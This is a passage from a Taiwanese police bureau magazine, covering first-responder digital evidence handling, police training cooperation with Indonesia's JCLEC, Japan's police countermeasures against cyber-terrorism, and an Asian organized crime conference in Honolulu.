● 各種電腦及系統，例如桌上型、

手提型電腦、手機、PDA等等。

● 資料儲存裝置，例如USB、外

接資料庫。

● 週邊連結產品，例如音箱、麥

克風、印表機。

● 網路系統，例如：網路介面卡

等。並將市面常見之電子儀器

之機型及態樣，以實圖展現。

電腦知識─分析員必備能力之一


電子儀器犯罪現場保全及建檔

在搜證之時，請注意以下：

● 有無不相關及無權責之人在

場，若有，應請其離場；確認

利害關係人，必要時予以隔離

偵訊。

● 不要改變電腦或電子儀器的現

狀，例如電腦在關機中，就不

要隨意開機。

● 應全程錄音、錄影，紀錄相關

產品之所有資料，例如：型

號、所處地點、置放方位、電

源、電子儀器之開關機狀態、

螢幕所顯現之畫面、所有與該

電子儀器相連之其他產品及設

備、以及任何網路系統（含無

線網路）。注意在此步驟時，

要同時注意到電腦內所含資料

可能受到法律保障，而禁止

無搜索票之蒐集，否則即可

能違反法定程序。若員警發現

案件證據資料之取得必須有搜

索票而卻未持有的情形之下，

則紀錄目視所及之情形，例如

包含電子儀器地點、方位及是

否開關機。而若有必要移動電

腦時，則要確定電腦是否關機

中，因為在使用中的電腦或電

子儀器，一經移動，可能會改

變、甚至損及其內部所含的數

位證據。

收集證據之流程

遵照並正確地處理數位證據

蒐集之流程，是提供電子資訊完整

性的關鍵步驟，隨意地就切斷電源

或關機，可能會造成內部資料的損

壞或流失，因此，未接受過數位證

據處理之訓練者，切忌嘗試自行挖

掘數位證據或恢復資訊、不要按任

何鍵或移動滑鼠、不要改變電腦的

狀態或搬動電腦、更不要接受無權

責者所提供的技術協助，而要將所

查獲的電子儀器送交受過電腦專業

訓練且有權責者處理。

數位證據打包程序及運送安全

確保所有的證據已有仔細編

號、標示、建檔及放入合適之證據

袋內；應將存放數位證據之物品，

例如手機、磁碟片、偽造信用卡

等，放入可以隔離靜電或磁波之隔

離袋，以避免因受到外界干擾，更

應避免在扣押之後所接收到的簡訊

等資料而變更了查扣當時的證據原

貌。而在運送過程中，除要避免折

損證物袋之外，也要全程錄音及錄

影，以利日後就證據查扣之完整

性，提出有力證明。

利用電子儀器可能觸犯的犯

罪種類多元，常見的有：兒童虐

待，家暴、賭博、毒品、網路詐

欺、身分竊案（Identify Theft）、

獲悉網路犯罪流程圖電腦監控系統作業情況

52


以及跟蹤騷擾等。在手冊中，就每

種犯罪類型，特別提出各個應該搜

查之物品，舉例來說，查辦偽造信

用卡案件時，應查扣之物品包含有

電腦、手提可移動式之電子儀器、

PDA、有關網路活動之資訊、有關

支票、現金及本票之資訊；外接資

料庫之設備；信用卡磁卡讀卡機；

網路銀行軟體程式；複製簽名機；

顧客資訊或信用卡資料；偽造之身

分證明；偽造財物交易證明；有關

財務紀錄之資訊；以及資料庫列印

出來的資料等。在這種多元的犯罪

種類中，每個犯罪類型個別要蒐集

的資料琳琅滿目，幸虧手冊亦有列

出處理所有不同犯罪類型而需查扣

不同之數位證據時，所應包含的資

料之通則，這些通則包含了：案件

的總結論（Summary of Case）；

扣押的數位證據的密碼；偵查的重

點之資訊；初步的偵查報告及相關

檔案；關鍵字之總覽；可疑的犯罪

活動；以及可疑的資訊等。

在該手冊之第41頁，清楚劃

出蒐集數位證據之標準作業流程。

● 問題一　以目視判斷電腦是否

處於開機中？說明若電腦處於

開機時，應如何處理；若是電

腦處於關機中，則又該如何處

理？

● 問題二　基層員警是否可以就

地找到受過電腦專業知識訓練

的執法者在場，且獲得其同意

協助？若有這樣的人物時，則

應請求協助並遵照建議辦理！

● 問題三　該電腦是否連結至網

路系統的環境？若答案是肯定

的，則第一線的基層員警即應

該停止動作，不可將電腦關

機，而應該聯絡受過網路犯罪

扣押證據資料訓練的執法者前

來協助。

● 問題四　發現數位證據之時，

該電腦或電子儀器是否正在進

行資料重整或刪除等足以破壞

證據的程序之中？若是電腦正

進行資料刪除等破壞程序，應

移除電腦背後之電源線。

● 問題五　在直接目視的情形之

下，是否可以看到螢幕上展現

出具有珍貴證據價值的數位證

據？若是，則應將螢幕所顯示

之資訊仔細地且透澈地照相及

建檔。

我國現況及應改善之處

因為網路的無遠弗屆，近年

來我國民眾也遭受到網路犯罪侵害

之苦，尤其是詐欺案件，更是打亂

了民眾的生活！依據警察法第二條

所示的警察任務，保護民眾財產安

全是警察天賦職責！惟要順利達成

任務，則必須要有相當的偵辦技

巧。然據統計，目前我國員警的年

分析小組人員工作情形


齡有高齡化趨勢，尤其是多數的基

層員警，年齡達35歲以上者眾。因

為電腦網路等的快速發展，只是近

2、30年之事，也就是說，相較於

電腦的發展史，尤其是新興的電腦

犯罪類型的普遍，我國多數基層員

警的求學年代，早於電腦網路的發

展！因此，除非基層員警們在進入

職場之後，仍持續接受電腦專業知

識的訓練，而且能夠隨時更新電腦

網路等知識技能，否則，他們對於

新興電腦網路犯罪的專業知識恐較

欠缺！由於，當他們在第一線執勤

而發現可能有電腦犯罪之疑慮時，

有無能耐做好初步偵查、不僅完善

保全數位證據，且能注意到程序正

義等問題，則攸關執法單位是否能

夠順利破案，展現公權力，進而降

低甚至於遏阻電腦犯罪的關鍵！因

此，讓處於第一線的基層員警，在

面對查處數位證據之時，至少能夠

有能力正確且合法地處理這些證

據，就成為警政單位在打擊電腦犯

罪時之當務之急！

結論

近幾年來，我國員警的素質

大幅提升，尤其自從民國95年起，

為求員警來源多元化及快速補充警

力的需求之下，而招考特考班學

員。這些年青生力軍中，不少人已

具備相當之電腦專業知識，但這些

人的比例，尚只占全體基層員警數

的小部分，因為人數比例不高，我

們不能過度樂觀地認為這樣就足夠

打擊電腦犯罪！面對資料極易毀壞

及可能受到法律保護等高度挑戰的

數位證據，執法人員的確易於感受

到偵辦上的壓力！美國有鑑於身處

第一線的基層員警在處理數位證據

的重要性，而編列教導指南，讓基

層員警知所遵循，這種積極、主

動、認真且負責的態度，是保障民

眾權益的具體化作為！或許他們的

教導指南並不一定適用於我國，筆

者認為，透過本文的介紹，或可讓

我國的執法單位認真思考我們應有

的作法─就目前的現實，發展出屬

於自己的標準作業流程，並且好好

地教育我國基層員警，讓他們在遇

到數位證據時，能夠知悉並遵照標

準作業流程，以確保所得之數位證

據之完整性及合法性！如此一來，

就能夠真正將基層員警也納入打擊

電腦犯罪的一環而增強科技執法的

量能。當我們努力讓基層員警在

初步偵查時真正發揮功能，也就意

味著我國正朝向科技警網大步邁進

中！

美國加州法務部看板

刑︱事︱好︱夥︱伴　　Good Companion

54

印尼因為長期政治向中國傾

斜，以致對我國之交往可由印尼數

十年以來之公務護照中所載：「本

護照持照人不得前往以色列及臺

灣。」便見端倪。以色列是猶太

教，與印尼回教或屬於宗教因素，

然臺灣則是屬於政治因素所導致。

綜觀我國警方與印尼警方之

互動交流訪問上，雖我國有派駐警

察聯絡官於印尼首府雅加達，然

而，就雙方交流互訪、簽訂任何書

面文件，印尼警方仍見保守、謹

慎。筆者前於2007年派駐泰國曼

谷擔任警察聯絡官時，因緣際會

下，由澳洲派駐曼谷大使館內之澳

洲聯邦警察介紹，因而瞭解了雅加

達合作執法中心（Jakarta Center

for Law Enforcement Cooperation,

JCLEC）這個訓練機構，當時筆

者亦曾在泰國透過國際警方友軍

協助，越洋爭取臺灣警方能前往

JCLEC參訓之機會，歷經數月之運

作，原業已獲得JCLEC同意出具邀

請函邀請臺灣警方派員參訓，我國

警方參訓同仁僅需自行負擔往來機

票等交通費，然而卻在最後關頭遭

印尼外交部跳出阻攔而告失利。

JCLEC是什麼？為何我們一

直設法想要參訓？它有什麼重要

性？以下筆者則對JCLEC的成立宗

文、圖／岳瀛宗（刑事局國際科）

經過4個月的努力爭取，印尼JCLEC最終同意臺灣警方派員參加重大犯罪之國際管理課程。

印尼雅加達執法合作中心參訓記事

筆者與雅加達合作執法中心人員合影。


旨、目的與功能做一簡單之介紹。

簡介概況

位於印尼中爪哇省三

寶壟市國家警察專科學校

（AKPOL）旁之雅加達執法合

作中心（The Jakarta Centre for

Law Enforcement Cooperation,

JCLEC）主要是作為東南亞地區打

擊跨國及恐怖主義犯罪之基地，並

訓練區域內政府執法部門人員加強

打擊前述破壞亞太地區之跨國犯罪

與反恐之執法能力。該中心經澳洲

政府於2004年2月承諾在未來之5

年內，將出資3,680萬澳幣，協助

印尼政府建立，分別由印尼國家警

察總署總監與澳洲聯邦警察署長為

負責人，並分別派員常駐擔任重要

幹部，同時印尼國家警察亦派警准

將一名，擔任中心管理委員會秘書

長，並由2004年7月3日由總統梅

佳娃蒂正式主持開幕儀，同年11

月正式運作。

此中心之成立，展現出各國

對於當代雙邊或區域內國家安全議

題重視與分享，自從宣布成立，

許多國家紛紛表示高度興趣，願意

提供技術及訓練及資金上援助。

該中心與設於馬來西亞吉隆坡之

「東南亞地區反恐中心」（ the

South East Asia Regional Centre

for Counter Terrorism, SEARCCT）

及泰國曼谷之「國際執法學院」

（International Law Enforcement

Academy, ILEA）亦緊密合作，成

為東南亞反恐、打擊跨國犯罪執法

人員之堅實鐵三角訓練基地。

成立目的

該中心之長期目的係致力於

強化執法人員在亞太地區對抗接踵

而來之跨國犯罪與恐怖活動，與跨

越多個不同區域之司法管轄與調查

之執法能力，而希望藉由以下訓練

方式及訓練課程之推動予以達成：

● 加強執法反應能力，以阻止及因應對抗恐怖主義及其他跨國

犯罪。

● 加強建立及發展調查、管理能力。

● 促進發展更廣泛之情蒐技能與分享能力、交換犯罪情資。

● 建立強化情報與管理之過程。● 強化鑑識與管理能力● 強化既有及發展新的國內外執法合作伙伴關係及伙伴網絡。

● 運用科學及技術及影響立法與政策環境。

筆者隨同中心內部人員參觀園區。商討合作會議。

刑︱事︱好︱夥︱伴　　Good Companion

56

單位功能

該中心被賦予建立執法人員

執法及支援執法運作能力上之任

務，以促進地區間執法人員的合作

及鼓勵增進聯繫。專門之技術與智

能分享是基於以下之基礎：

● 專業執法教育與操作管理。● 情報與訊息交換。● 國際執法教育標準。● 法律之優位。● 實用之教育與訓練得以吸引大學生、學士後研究生獲取學分

進行更深層之執法或其他相關

研究。

在JCLEC的課程之安排上，

主要是提供訓練印尼警方為主，但

是所教授的是著重反恐、防爆、鑑

識、偵查與管理之理論、觀念與邏

輯，技術性的枝微細節則不是訓練

所強調的重點，而該中心則備有英

文、印尼文之課程翻譯人員。以今

年課程為例，全年度課程共有4個

選項語言係以英文教授，對象為全

東協會員國警方，而每一個課程，

並非都是由澳洲政府所支助，許多

課程金援、師資幾乎都是由歐洲國

家所提供（諸如歐洲議會EC、西

班牙、英國、美國、德國、荷蘭、

丹麥、加拿大等國或JCLEC本身由

澳洲全額贊助）計有：

● BDC（BOMB DATA CENTRE，

炸彈資料中心，2週課程）

● IMOSC（ INTERNAT IONAL

MANAGEMENT OF SERIOUS

CR IME，重大犯罪之國際管

理，3週課程）

● RELP（REGIONAL EXECUTIVE

LEADERSHIP PROGRAM，區

域執行統御領導（班）計畫，3

週課程）

● D V I（ D I A S T E R V I C T I M

IDENTIFICAION，災難被害人鑑

別，1週課程）。

成功紀實

筆者於2010年12月中旬再度

奉命派駐國外，機緣巧合擔任駐印

尼警察聯絡官，赴任後，即苦思尋

求能對兩國警政合作進行有意義之

實質交流，而突破以往並爭取我國

警方參與東協國家之JCLEC反恐、

防爆及鑑識、偵查等執法訓練，不

僅能夠為我國警察反恐、防爆、鑑

識及偵查管理科學能提升與歐美等

先進國家執法人員同步之國際視野

與技術，增強打擊跨國犯罪之執法

能量，對於筆者而言，也是一項艱

鉅的警察外交工作上之挑戰。

筆者除在印尼利用各種場合

向印尼警方高層及各國派駐雅加達

之警察聯絡官大力推銷臺灣警方

鳥瞰圖。


交通、食宿等一切全免。本局遂於

7月間派遣鑑識科研究員李經緯前

來參訓完畢。

筆者在2011年11月下旬遂在

印尼警察總署印尼籍之JCLEC執

行主任DWI將軍同意及安排下，親

自飛往三寶壟該中心拜會駐該中

心澳洲籍之課程執行主任BRIAN

THOMPSON（澳洲聯邦警察AFP

探員），代表我國警方提出請求

JCLEC能繼續於明年提供我方參訓

員額及臺灣警方提供JCLEC講授師

資合作事宜，BRIAN主任除全程帶

領筆者參觀整個校區及設施並親自

為筆者進行簡報外，亦對相關課程

加以解釋，並全程相陪共進午餐，

雙方在愉快之氣氛下結束會談。

JCLEC校區到底有多迷人？

以BRIAN主任一句話做總結：「我

們收到了很多來自各國學員的抱

怨，他們主要是抱怨訓練課程的天

數太短了！」

之偵查與鑑識能力，臺灣不能也

不願在全球警察家族共同打擊跨

國犯罪中缺席之堅定決心與意志

外，更多次親自向印尼警方高層

提出說帖，同時，駐印尼代表處

之夏代表亦從旁加以協助；在努

力4個月後，終於傳來佳音：印尼

警察總部來函通知，JCLEC業已

同意臺灣警方得派一員於2011年

7月間前來JCLEC參與為期3週之

重大犯罪之國際管理課程，為所

有參訓國家中唯一非東協國家之

成員，臺灣警方首次得以參訓以

東協國家警方為成員之著名訓練

基地，實具有重大之歷史意義。

為避免政治的複雜因素再度摻雜

入單純的警察訓練交流中，筆者

隨即親自向印尼警察總署承辦單

位請託，臺灣學員赴印尼簽證由

我方自行在臺灣申請，無需送印

尼外交部協助核發簽證，至此，

參訓結果終於底定，筆者再度協

調，提出參訓學員應一視同仁之

平等請求，亦終於獲JCLEC主任

同意，因此亦與其他東協國家學

員一樣，參訓期間包含往來機票

JCLEC立牌。

國際會議廳。

58

國︱際︱瞭︱望︱台　　 International Observation Post

58

文、圖／陳文哲（刑事局國際科）

日警設立專部、培訓專業人員、建立網軍及網路監測系

統，並加強警民、國際之間的合作，以應網路恐怖攻擊。

日本警方

資通設備是社會經濟活動的

基礎，近年來更是民間企業及政府

部門重要利用工具，目前似已成為

民眾日常生活的一部分，且隨著資

通網路使用的普及，犯罪案件亦隨

之增加，違法資料、有害情報快速

於網路上散播，影響層面既深且

廣。

於資通網路工具高度發達

下，倘國家重要基礎設施系統遭受

網路駭客攻擊，對國民生活及社會

經濟活動將產生巨大衝擊，形同恐

怖攻擊效果，造成人心恐慌、經濟

停滯甚至衰退，所遭受之損失，難

以數計，致各國警方無不絞盡腦汁

制定相關對策及取締作為，以防堵

危害擴大及取締不法。

因應網路恐怖攻擊對策


重大事例

2010年9月自稱中共網路駭客

集團「中國紅客聯盟」成員於「中

國民間保釣聯合會」網站，以中日

釣魚臺（日本稱尖閣諸島）主權爭

端為由，呼籲對日發起全面駭客

攻擊。嗣日本警察廳（警政署）

自9月16日起至9月18日止3度遭到

DDoS網路攻擊，導致網頁遭侵植

變更等無法閱覽情形。2010年9月

伊朗核能發電廠等約3萬臺電腦發

現遭感染電腦病毒，該病毒主要以

電力、瓦斯等產業資訊系統為攻擊

目標，雖然日本相關產業受害情形

雖未獲確認，但研判應有感染案

例。2009年至2010年間日本鐵道

業者等網頁亦出現多起遭竄改及網

路使用者個人電腦感染病毒案例。

日本網路犯罪情形

隨著網路普及與電腦大眾

化，近年來網路犯罪件數不斷攀

升，日本網路犯罪類型概分違反

禁止不當入侵法、以電腦及電磁

紀錄為對象之犯罪及利用網路工具

之犯罪等3大類，於2010年共破獲

6,933件，較2009年增加243件、

3.6％，為近10年最高峰。其中

利用網路工具之犯罪者，於2010

年破獲5,199件，較2009年增加

1,238件、23.8％，件數呈現巨幅

成長，案件內容包括詐欺、兒童買

春及色情圖片、違反著作權、商標

法及散播猥褻物品等（詳破獲件數

統計表與趨勢表）。

日本2001年至2010年網路犯罪破獲件數趨勢表

違反禁止不當入侵法利用網路工具之犯罪以電腦及電磁紀錄為對象之犯罪

日本2001年至2010年網路犯罪破獲件數統計表年別 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010

合計（件） 1,339 1,606 1,849 2,081 3,161 4,425 5,473 6,321 6,690 6,933

違反禁止不當入侵法 67 105 145 142 277 703 1,442 1,740 2,534 1,601

以電腦及電磁紀錄為對象之犯罪 63 30 55 55 73 129 113 247 195 133

利用網路工具之犯罪 1,209 1,471 1,649 1,884 2,811 3,593 3,918 4,334 3,961 5,199

2001 2002 2003 2004 2005 2006 2007 2008 2009 2010

8000

7000

6000

5000

4000

3000

2000

1000

0


60


日本針對網路恐怖攻擊因應

對策

對網路犯罪基本體制

由於網路具有快速便捷、大

量傳播、低成本、高匿名性等諸多

特性，已成為現代人除手機外最常

使用的資訊設備，更由於通訊技術

進步與網路普及衍生許多新類型網

路犯罪，日本地方警察本部（警察

局）於1999年設置「網路犯罪對

策室（課、中心）」，以因應急速

增加之網路犯罪案件，除專責取締

及預防被害外，並加強宣導防範意

識，防止企業或個人蒙受損失。

又因網路世界無時空隔閡與

限制，可於短時間內影響不特定人

生活及工作，警方為統合資源，並

共享情資，同時避免相牽連單位重

複偵查，浪費人力物力，於2004

年設置「情報技術犯罪對策課」，

由警察廳指導及協調地方警察本部

偵辦網路犯罪案件，並舉辦偵查員

講習訓練，提供與產業界或外國治

安機關交流合作機會，期以更專業

化人員及設備，對抗不法入侵、色

情網站、網路詐欺及非法買賣等網

路犯罪。

反恐怖攻擊對策體制

平時措施及防處對策：

中央由警察廳警備局、生活

安全局及資訊通信局幹部成立跨單

位「網路恐怖攻擊對策室」，負責

指導及協調全國各都道府縣警察本

部之網路恐怖攻擊對策，並推動實

施相關教育訓練；地方由都道府縣

警察本部及中央派出機關之資通

部門策訂「網路恐怖攻擊對策計

畫」，對提供重要基礎設施企業進

行訪問及提供訓練，推動建立官民

合作應處對策。

建構基礎技術：

● 建立網軍─各級警察機關遴選網路資通專才人員成立「網路

部隊」（Cyber Force），負

責網路恐怖攻擊對策問題之技

術指導及支援，警察廳則設立

「網路部隊中心」作為指揮協

調司令塔，負責24小時蒐集及

分析網路恐怖攻擊相關預警情

資，並將其結果提供重要基礎

設施企業參考。另該中心亦作

為網路恐怖攻擊事態發生時之

緊急應變技術支援據點。

● 建立即時監測網路系統─「網路部隊中心」籌建即時監測網

路系統，掌握病毒流向及被害

動態，日本並於2009年對該系

統進行全面更新，強化資訊蒐

集與分析能力。

60


因應網路恐怖攻擊合作體制

推動官民網路攻擊合作對策

警察機關對重要基礎設施企

業個別提供威脅資訊及建立相互通

報機制，以及轄區警察機關與重要

基礎設施企業共同實施講習訓練，

提升對網路恐怖攻擊之緊急應變能

力。另警察機關除不定時舉行網路

恐怖攻擊對策研討會外，並與重要

基礎設施企業成立「網路恐怖攻擊

對策協調會」，進行意見交換與問

題研討。

強化國際合作

國際上依據1997年12月八大

工業國（G8）司法及內政部長聯

席會議訂定之「對抗高科技犯罪原

則及行動計畫」，於跨國犯罪合作

上，應指定聯繫單位，並建立24

小時聯絡窗口，同時為迅速有效因

應跨國網路犯罪，應選派網路專業

人才，透過指定的聯絡窗口，藉由

立即且可信賴的傳輸方式取得聯

繫，迄2010年12月止，已有58個

國家及地區加入「24/7 High Tech

Crime Network」，日本聯絡機關

及窗口設於警察廳。警察廳為強

化應處能力，2010年9月派員參加

美國國土安全部主辦之「網路風

暴Ⅲ」網路恐怖攻擊對策演習，

並積極與國外相關機關合作，進

行大規模防駭訓練；2010年10月

亦參加國際資安問題對策研討機

制「FIRST」（Forum of Incident

Response and Security），蒐集資

安緊急事態發生時之應變技術資

訊。

提供網路使用者即時情報

警察廳於官方網頁上提供網

路使用即時相關資訊，例如各類軟

體弱點、網路攻擊案例與應處方

式、病毒種類、非法入侵手法及其

演變、資訊安全資料及提升防衛能

力等，供個人使用者及網路管理者

參考及運用。

日本為查緝跨國網路犯罪及

情資交換，主要係透過國際刑警

組織（ICPO-Interpol）、司法互助

條約或協定（刑事共助條約或協

定），及網路犯罪24小時聯絡窗口

等3架構及管道，與外國執法機關

進行聯繫與合作。

各國對網路使用規範之立場

歐盟為主之網路犯罪公約

日本2002年4月由經濟產業省

（經濟部）委託產官學界組成研究

團體針對「網路犯罪公約（Cyber-

crime Convention）」提出評估研

網路攻擊竊取資料日本國內相關機關技術及情報交換資料解析

62


究，並供相關部門參考。而網路犯

罪公約係2001年11月由歐洲理事

會的26個歐盟成員國以及美國、

加拿大、日本與南非等30個國家

政府官員於布達佩斯所共同簽署的

國際公約，係國際上首次針對網路

犯罪行為所制訂的公約。條文計

48條，包括定義（Definitions）、

非法使用（Illegal access）、非法

擷取（Illegal interception）、妨害

資料或系統（Data interference、

System interference）、濫用設

備（Misuse of devices）、電腦

相關偽變造、詐欺（Computer-

related forgery、Computer-related

fraud）、公司責任（Corporate

l i a b i l i t y）、制裁及其措施

（Sanctions and measures）等。

國際組織下之網路行動規範

鑒於網路普及所衍生的問題

日益複雜，近年來於阿拉伯地區利

用資通網路工具串連反政府勢力，

散播推翻專制政府訴求，甚至集結

示威，危及社會治安，造成政治動

盪等時有所聞，對於網路使用規範

及其管理政策上，國際社會目前似

形成兩大集團壁壘分明傾向。美國

認為資料的自由交換與使用有其必

要性，歐盟亦認為自由相當重要，

但可作部分限制，日本則未明確表

示立場，基本上歐美日等先進國家

屬於自由派立場；而中國與俄羅斯

等國則倡議制定國際性規範，並於

2011年9月聯合國大會中散發使用

網路「行動規範案」，訴求於國際

組織下制定相關行動規範，草案中

允許各國得依據各國內法檢查網路

資訊，印度亦要求聯合國召開制定

規範協調會，基本上發展中國家同

意強化網路管理，故中國、俄羅斯

及印度等發展中國家係採規範管理

派立場，造成採管理攻勢的新興國

家，與確保自由的先進國家雙方的

攻防戰，雖然向來標榜自由主義的

美國為網路世界事實上支配者，但

畢竟先進國家仍屬少數派，對於多

數新興國家，尤其崛起中經濟大

國，仍有加強協調及妥協之處。

結語

近年來，伴隨政府機關及民間

企業多改以電子郵件等數位資料方

式儲存內部資訊之發展，目前已出

現專以竊密為目的之目標型電郵型


態病毒，並進而演變成網路諜報活

動。由於網路諜報竊密足以對國家

外交、安全產生重大影響，尤其國

家重要基礎設施之弱點情報倘遭竊

取，可能進行網路恐怖攻擊，危及

國家整體政治、經濟安全情勢，殊

值職司治安維護與國家安全單位，

與產官學界攜手合作，成立跨部會

網路專責單位，提升國家整體防衛

意識與能力，並積極與外國建立情

報交流與合作機制，並將即時資訊

提供可能受害之國內機關與企業，

以期建構安全、安心、便捷的網路

科技社會。

東京都警察廳門口

64

國際

交流

64

國際

交流

64

國際

交流

財政部財稅資料中心蘇俊榮主任等人蒞局參訪101年5月21日財政部財稅資料中心蘇俊榮主任等人蒞局參訪。

文、圖／許淑華（刑事局國際科）、賴伯榮、施騰凱（刑事局鑑識科）


國際

交流


國際

交流


國際

交流

財政部財稅資料中心蘇俊榮主任等人蒞局參訪101年5月21日財政部財稅資料中心蘇俊榮主任等人蒞局參訪。

66

國際

交流

66

國際

交流卡達警察訓練學院院長Dr. Mohammed Abdulla Al Muhanna AlMri等5人蒞局參訪卡達警察訓練學院院長Dr. Mohammed Abdulla Al Muhanna AlMri等5人於101年

6月14日蒞局參訪。


國際

交流


國際

交流

68

心︱情︱隨︱筆　　Mood Story

文、圖／林喬源（刑事局國際科）

這趟亞裔年會之旅，與李昌鈺博士及美方

駐檀香山警力充分交流，著實受益匪淺。

本（101）年度「第9屆亞

裔組織犯罪暨恐怖主義國際會

議」於4月16至20日計5日假美

國夏威夷檀香山市威基基希爾頓

飯店舉行，由於近年跨國犯罪日

益增多，犯罪國際化成為各國執

法單位極力防制的問題，為能減

少全球亞裔幫派和恐怖組織犯罪

所帶來的威脅，特邀集全美各地

經驗豐富之執法人員、學者、專

家共同研討，並透過與會人員經

驗交流互相學習，從而提升專業

技能，本次研討議題涵蓋恐怖主

義、特殊犯罪類型、亞裔組織犯

罪以及鑑識科學技術。

本局自民國81年第14屆年會

起首次獲邀參加該項會議，之後

每年均派員與會，迄今已20年，

本會議規模極大，歷年來各國警

政高階首長出席踴躍。今年，由

本局楊副局長源明率駐美聯絡組

邱俊誠及筆者等人前往美國檀香

山市與會，期盼藉本次機會，與

美國聯邦調查局、國稅局、緝毒

局、密勤局、移民暨海關執法局、

夏威夷檀香山市警察局等執法機

關，以及亞洲國家日本、韓國、

新加坡、柬埔寨代表團等警政高

層相互交流，共同討論對抗跨國

犯罪之最新情勢及演變，展現我

國對打擊犯罪的決心和誠意，並

謀求國際合作新突破，對我國未

來研擬犯罪防制對策、查緝跨國

走私犯罪、建立打擊跨國犯罪合

作機制、促進國際聯絡與合作及

情報交換等均有實質助益。

此次本局出訪行程主要是出

席亞裔年會，另獲邀參加我國駐

檀香山辦事處籌設晚宴，並特地

安排拜會友我之美國執法機關駐

檀香山辦公室，相關心得與經驗

分述如下。

第9屆亞裔組織犯罪暨恐怖主義會議記述及心得分享


出席「第9屆亞裔組織犯罪暨恐

怖主義國際會議」

4月16日上午8時大會舉行開

幕式，儀式首先由大會主席LAURY

上臺致歡迎詞，同時宣布本次會議

除美國當地執法人員與會外，還有

來自世界計20個國家執法機關人員

共襄盛舉，嗣後由大會主持人報告

相關議程、注意事項等，接著由主

（協）辦之美國執法單位主管輪流

上臺致詞。

儀式開始前，本局訪團一

行即先行與大會執行長Benjamin

Leong等人相互致意，並經由駐處

移民秘書鄭翔徽引介檀香山警察局

局長Louis Kealoha、副局長Dave

M. Kajihiroz等人。中場休息時，楊

副局長除代表本局林局長向國際

知名鑑識專家及警大傑出校友李昌

鈺博士致意外，並主動與美國執法

機關人員及亞洲國家代表，包括日

本、韓國、新加坡、柬埔寨等代表

團人員相互致意。

此外，大會特別安排李昌鈺

博士擔任首日主講人，演講主題為

「全球犯罪新鑑識技術」，李博士

於演講中首先提及從事刑事鑑識工

作迄今，分別在全球48個國家參與

超過8,000件的刑案鑑定調查，並

分享其人生經驗，如成功要素包含

領導能力、專業技巧、願景、團體

合作，管理技巧著重目標、時間、

資料、員工、金融、個人及壓力

等。

另分析當前美國犯罪趨勢及

改變，如暴力犯罪案件在過去10年

間增幅達45％，並介紹恐怖主義犯

罪、毒品犯罪（造成52,000死亡、

51,200億美元金錢損失、全球HIV

病情擴散）、全球人口販運（計達

600,000到800,000人受害）、跨

國犯罪集團（計有20,000到38,000

多個幫派團體）。

再者，提及刑事偵查理論的

新概念，包含犯罪現場、證人、生

理證據、資料探勘、大眾資訊及情

報來源等，新的偵查技術則有影像

增強及分析、數位影像記錄及分

析、電子監控、犯罪現場鑑定及繪

圖、人工情報、3D現場重建技術

等，並以一員警槍擊案作案例，提

出處理過程的專業經驗分享。

由於李博士談吐十分恢諧幽

默，同時具有豐富專業涵養，另個

人魅力極佳，在整段演說過程中，

全場笑聲不絕於耳。與會者無不仔

細聆聽，努力汲取科學鑑識新知，

以瞭解當前全球刑事鑑識技術最新

發展，讓所有與會者獲益良多。

嗣後，自4月17至19日每日上

午在飯店會議廳則有安排專題演

講，演講題目包含農業恐怖主義、

澳洲反恐工作、日本幫派組織犯

罪、數位證據、網路犯罪等。下

午則分為3個場地同時進行分組報

告，主題涵蓋恐怖主義、特殊犯罪

類型介紹、亞裔組織犯罪以及鑑識

科學等4個方面。

本局楊副局長在會場上留影。本局楊副局長（左）、李博士（中）與檀香山市警察局局長（右）在會後合影。

70


參加我國駐檀香山辦事處晚宴

4月16日晚間6時，我國駐檀香山辦事處章處

長文樑為接待李昌鈺博士伉儷及國內與會訪團，特

籌設晚宴款待，出席人員包括僑務委員趙光斗（警

官學校32期校友）、駐處章處長文樑、秘書盂陳

勝及秘書鄭翔徽、海巡署訪團副署長尤明錫、科員

溫恆、調查局訪團國策顧問吳東明、處長汪忠一、

調查官耿萬隆、調查官林家弘等及本局訪團楊副局

長、駐美聯絡組邱俊誠及筆者，共計15人，席間章

處長首先致歡迎詞，隨後聽聞李博士暢談分享人生

閱歷及職涯發展過程等，倍感獲益良多，宴席過程

氣氛融洽，相談甚歡，愉快落幕，最後由楊副局長

代表本局林局長致贈禮品予李博士，另致贈禮品予

章處長、趙僑務委員及此行協助接待駐處秘書鄭翔

徽等人，以表達謝忱。

拜會美國移民暨海關執法局駐檀香山辦公室

4月17日上午10時本局訪團赴移民暨海關執

法局駐檀香山（簡稱 ICE）辦公室進行拜會，並

由該室主管Wayne K. Wills及副主管Marjorie A.

Thompson等人出面接待，楊副局長除就99年10本局訪團與ICE主管Wayne K. Wills及副主管Marjorie A. Thompson合影留念。

宴會上大家氣氛融洽，相談甚歡。

參加亞裔會議舉行之晚宴。


月本局國際刑警科與該局駐港辦公室Tatum King合作

偵破郭○聖人蛇集團蒐購附有美國簽證之臺灣護照案

首表感謝外，並分享去（100）年本局與大陸及東南

亞國家警方合作執行「0310」及「0928」專案共同

打擊跨國詐欺集團成功經驗及心得，及表達期待未來

雙方能就人口販運及偽變造護照及毒品等案件加強合

作，以爭取辦案時效，提升偵查效率。

另向該室表達，在不久的將來，臺灣可能成為美

國免簽證（VWP）國家，預期未來臺灣赴美國及夏威

夷等地的觀光人數勢必大幅增加，恐有臺籍不法分子

藉機入境夏威夷從事犯罪活動，屆時雙方更應密切合

作。

該室副主管Marjorie A. Thompson表示其與該局

駐港人員Tatum King私交甚篤，同時感謝本局對於該

局之配合及協助，該室主管Wayne K. Wills表達樂見與

本局進行相關案件合作，雙方會談氣氛融洽，會後互

贈禮品及合影留念，我方也邀請該室人員來局參訪。

拜會美國聯邦調查局駐檀香山辦公室

4月19日下午14時30分本局訪團赴美國聯邦調

查局駐檀香山辦公室拜會，由該室主管Robert Jones

及幹員Paul、Johnathan等人出面接待，雙方除就我

國黑道幫派在美活動情形、暴力犯罪與毒品犯罪現況

及機場港口緝毒安檢交換意見外，並分享去（100）

年本局與大陸及東南亞國家警方合作執行「0310」

及「0928」專案共同打擊跨國詐欺集團成功經驗及

心得，希冀將我國偵辦跨國電信詐欺經驗提供美方參

考，另表示美國聯邦調查局與本局在有關打擊犯罪的

業務職掌相近，同樣都是負責偵辦全國性各類重大犯

罪，且去（100）年12月20日兩國已簽署「強化預防

及打擊重大犯罪協定」（PCSC），並律定本局與美

國聯邦調查局為該協定聯繫窗口，因此，未來雙方有

必要在共同打擊犯罪工作上積極加強合作關係。

另外，該室人員對於臺灣防制及打擊電信詐欺犯

